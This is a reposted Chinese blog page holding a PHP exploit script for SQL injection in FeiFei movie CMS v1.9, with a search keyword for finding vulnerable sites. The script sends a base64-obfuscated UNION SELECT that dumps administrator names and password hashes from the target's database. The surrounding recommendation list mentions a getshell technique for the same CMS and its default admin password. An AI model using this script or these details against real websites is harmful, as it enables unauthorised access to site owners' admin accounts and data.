飞飞影视php 漏洞,飞飞影视SQL injection exploit[转]

最新推荐文章于 2021-08-20 11:24:33 发布
最新推荐文章于 2021-08-20 11:24:33 发布
阅读量3.3k 收藏
点赞数
文章标签: 飞飞影视php 漏洞

/**

* 飞飞影视管理系统 SQL injection

* 飞飞影视系统PHP版 v1.9 injection exploit

* by:www.08sec.com fans

* keyword “Powered by www.ff84.com”

*/

error_reporting(E_ERROR);

set_time_limit(0);

if ($argc<3) {

print_r(‘

——————————————————

Usage: php ‘.$argv[0].’ host path

host: target server (ip/hostname),without”http://”

path: path to ff84cms

Example:

php ‘.$argv[0].’ localhost /

——————————————————-

‘);

die;

}

$host=$argv[1];

$path=$argv[2];

$html=”;

$cookie=””;

$agent=” User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1″;

$content =””;

$data = “POST /?s=vod-read-id-1″.base64_decode(‘JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==’).”html HTTP/1.1\r\n”;

$data .= “Host: “.$host.”\r\n”;

//$data .=”Cookie: “.$cookie.”\r\n”;

$data .= “User-Agent: “.$agent. “\r\n”;

$data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n”;

$data .= “Accept-Language: zh-cn,zh;q=0.5\r\n”;

$data .= “Accept-Encoding: gzip,deflate\r\n”;

$data .= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n”;

$data .= “Connection: keep-alive\r\n”;

$data .= “Content-Type: application/x-www-form-urlencoded\r\n”;

$data .= “Content-Length: “.strlen($content).”\r\n\r\n”;

$data .= $content.”\r\n”;

Sendpack($data);

if (!eregi(“Tpl”,$html)){

// echo $packet.”\r\n”;

// echo $html.”\r\n”;

die(“Exploit failed…”);

}else{

$pattern=”/@(.*)@/i”;

preg_match($pattern,$html,$pg);

echo “$pg[1]\r\n\r\n”;

echo “\r\nExploit succeeded…\r\n”;

}

Function sendpack ($packet)

{

global $host, $html;

$ock=fsockopen(gethostbyname($host),’80′);

if (!$ock) {

echo ‘No response from ‘.$host; die;

}

fputs($ock,$packet);

$html=”;

while (!feof($ock)) {

$html.=fgets($ock);

}

fclose($ock);

}

海恩·欧鲁纳
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
飞飞php影视系统漏洞,feifeicms_v5.0.151112 飞飞影视系统PHP版5.0升级了ThinkPHP内核2.1.1至3.2.2 修复了之前的全部漏洞, Web Server 266万源...
weixin_39830175的博客
03-10 1523
文件名称: feifeicms_v5.0.151112下载 收藏√ [5 4 3 2 1]开发工具: PHP文件大小: 3814 KB上传时间: 2016-10-14下载次数: 0提 供 者: liyao详细说明:飞飞影视系统PHP版5.0升级了ThinkPHP内核2.1.1至3.2.2 修复了之前的全部漏洞,ThinkPHP3.2.2需要php5.3或更高版本的支持,达不到环境请...
飞飞php影视系统漏洞,飞飞影视最新版前台无限制getshell
weixin_34421376的博客
03-28 1645
public function fetch($templateFile='',$charset='',$contentType='',$display=false){//die('errorcode');echo 'fetch';G('_viewStartTime');// 使用null参数作为模版名直接返回不做任何输出if(null===$templateFile) return;// 网页字符...
飞飞php影视系统漏洞,飞飞影视系统PHP版 v1.9 injection exploit漏洞预警 -电脑资料...
weixin_39865102的博客
03-10 1296
文章作者:honglousy昨天整的 论坛旁站上的程序,发现用的人还真不少,简单的写了个exp。无聊之作.../***飞飞影视管理系统 SQL injection*飞飞影视系统PHP版 v1.9 injection exploit*by:www.08sec.com fans*keyword "Powered bywww.ff84.com"*/error_reporting(E...
开发技术分享
热门推荐
06-18 6万+
感谢大神,原帖链接http://bbs.pediy.com/showthread.php?t=182393 -------以下是贴内容----- 看雪论坛视频篇  1、Win32Asm与RadAsm开发教程 链接: http://pan.baidu.com/s/1pJlW8T9 密码: pd94 2、浴血凤凰DNF辅助系列教材 链接: http://pan.baidu.com
飞飞PHP影视系统PPVOD v1.1beta4
03-26
程序名称:飞飞PHP影视系统(PPVOD) 程序版本:1.0beta4 发布日期:2010-04-27 官方网站:www.ff84.com 安装环境:php5或更高版本、mysql5或更高版本 非常感谢您在众多的软件中选择了PPVOD,祝您使用愉快,如需帮助请到论坛交流! PPVOD安装说明 1. 将文件夹下所有的文件上传至您的网站空间 2. 如果您的主机为*nix操作系统,请设置如下文件夹权限为777 ./Conf ./Runtime ./Public/ads ./Upload ./Map ./Html 3.通过浏览器访问http://您的域名/install.php,根据提示填写mysql配置信息 4.完成安装后会自动跳到后台,默认用户名是admin密码是admin888 5.后台路径为http://您的域名/admin.php
hxxp://www.hao923.com.cn/劫持浏览器
Purpleendurer@CSDN
10-08 1万+
  一位网友在国庆那天,为了在网上看阅兵式,从网上下载安装了一个软件,不料IE主页被劫持为hxxp://www.hao923.com.cn/,用超级巡警无法修复,请偶帮忙检修。  右击网友电脑桌面上的IE图标,发现弹出的是网址快捷方式的快捷菜单,看来那个软件把桌面原有的IE图标换成了指向的hxxp://www.hao923.com.cn/的快捷方式,开始菜单中的Internet Explore
中国传统色彩名录
游戏
12-19 2141
原作者:青女 Quester  时间:2003-12-6  文档类型:原创  来自:蓝色理想西式的色名及色样表,可以参见以下链接 (Java 类色彩兼容):http://www.blueidea.com/download/product/2003/627_2.asp自言自语: 原先见过一个比较日本感的色彩图典,于是我也想作个中国色彩图典。——真是很难啊。现在粗略整理了一些,以后慢慢补充好了。要是有
PHP 小心urldecode引发的SQL注入漏洞
01-20
X1-1.5 notify_credit.php Blind SQL injection exploit”,你就知道。 Discuz 是国内很流行的论坛系统,被黑的网站应该会很多吧。不过我对入侵别人的网站不感兴趣,同时也鄙视那些代码都不会写只会使用别人放出的...
php-exploit:一些有趣PHP漏洞
05-28
我想成为php的大师:p,我将在这里与php分享我的日常活动。
ActiveX漏洞通用Exploit vbs修正版
09-06
作者:疯狗终于在milw0rm找到了一个不错的shellcode,down&exec的,灰常好用!顺手写了一个C测试了下,结果是成功下载并执行了"木马",muma.exe是我用delphi写的一个简单的执行测试程序,无毒无害。
SQL注入漏洞简单挖掘-01
09-15
在本课程中,我们将学习如何使用自动化工具进行SQL注入漏洞挖掘,并学习如何进行漏洞验证和exploit。课程内容包括: 一、CMS环境搭建(espcms) 在本节课程中,我们将学习如何搭建CMS环境,使用espcms作为示例。...
jackdaw-master_objects_sql_Exploit_attack_
10-04
Jackdaw is here to collect all information in your domain
2008-2010 AIX problem
ciol32244的博客
08-08 5107
1. mv: 0653-405 ./smit_result/smit.log and smit_result/smit.log are identical. 2. lsps –a输出结果各项意思 P...
Qt----网络编程
lengyuefeng212的博客
08-20 1859
文章目录网络编程一、获取本机的网络信息1. 应用实例2. 程序运行效果二、TCP通信1. TCP简介2. TCP服务端应用实例3. TCP客户端应用实例4. 程序运行效果三、UDP通信1. UDP简介2. UDP单播与广播1. 应用实例2. 程序运行效果3. UDP组播1. 应用实例2. 程序运行效果四、网络下载实例1. 应用实例2. 程序运行效果 网络编程 Qt 网络模块为我们提供了编写 TCP / IP 客户端和服务器的类。它提供了较低级别的类,例如代表低级网络概念的 QTcpSocket,QTcpSe
正则表达式合集
一位打工仔的博客
04-12 1708
表达式全集 字符 描述 \ 将下一个字符标记为一个特殊字符、或一个原义字符、或一个向后引用、或一个八进制义符。例如,“n”匹配字符“n”。“\n”匹配一个换行符。串行“\\”匹配“\”而“\(”则匹配“(”。 ^ 匹配输入字符串的开始位置。如果设置了RegExp对象的Multiline属性,^也匹配“\n”或“\r...
s1.1024gc.net/bbs/index.php,php
weixin_39860583的博客
04-11 7256
PHP Version 5.6.40SystemWindows NT iZfnfm4gc242osZ 10.0 build 17763 (Windows Server 2016) AMD64Build DateJan 9 2019 15:05:36CompilerMSVC11 (Visual C++ 2012)Architecturex64Configure Commandcscript /no...
编译内核 uliweb.clkg.org
走在左边
08-20 2587
http://uliweb.clkg.org/tutorial/read/11 跟着学内核吧 $ uname -r apt-get source linux-image-$(uname -r) sudo apt-get install kernel-wedge kernel-package libncurses5-dev sudo apt-get build-dep --no-in...
【linux】【装机】之 实战记录
tobeyourlover
09-10 766
1 硬盘分区与挂载fdisk -l #查看硬盘分区信息 fdisk /dev/sdb mkfs -t ext3 -c /dev/sdb1 vim /etc/fstab # 注意已有桌面用户后,不能重新挂载/home注意1: /etc/fstab格式说明:/dev/sdb1 代表哪个分区 ext3是该分区的格式 defaults 是挂载时所要设定的参数(只读,读写,启用quota等),输入defa
ust语言教程&案例&相关项目资源
最新发布
06-22
"UST"这个缩写可能有多种含义,但在编程和计算机科学领域,它可能指的是一种特定类型的数据格式或语言。然而,由于这不是一个广泛认知的编程语言或技术,我将假设你可能指的是一些特定领域的技术或工具。 如果你能提供更多的上下文或详细信息,我将能够提供更准确的资源。不过,以下是一些通用的步骤,你可以用它们来寻找几乎任何编程语言或技术的教程、案例和项目资源: 官方文档: 访问该语言或技术的官方网站,通常这是最权威的学习资源。 在线课程平台: 网站如Udemy、Coursera、edX、Pluralsight等经常提供各种编程语言和技术的课程。 技术社区: 加入如Stack Overflow、GitHub、Reddit等社区,搜索相关的标签或话题。 专业书籍: 利用Amazon、Google Books等资源搜索相关书籍。 视频教程: YouTube和其他视频分享平台是学习新技术的好地方。 博客和文章: 许多专家和爱好者会在个人或专业博客上分享他们的知识和经验。 开源项目: GitHub、GitLab和Bitbucket等平台上的开源项目是学习实际编程技能的好方法。 学术资源:
ms14-064漏洞复现停滞在Sending exploit
06-12
我理解你的问题是想要复现 MS14-064 漏洞,但是在发送 exploit 时遇到了问题,出现了停滞的情况。 首先,MS14-064 是一个由 Microsoft 发布的安全公告,涉及的漏洞编号为 CVE-2014-6324,它存在于 Windows Object ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值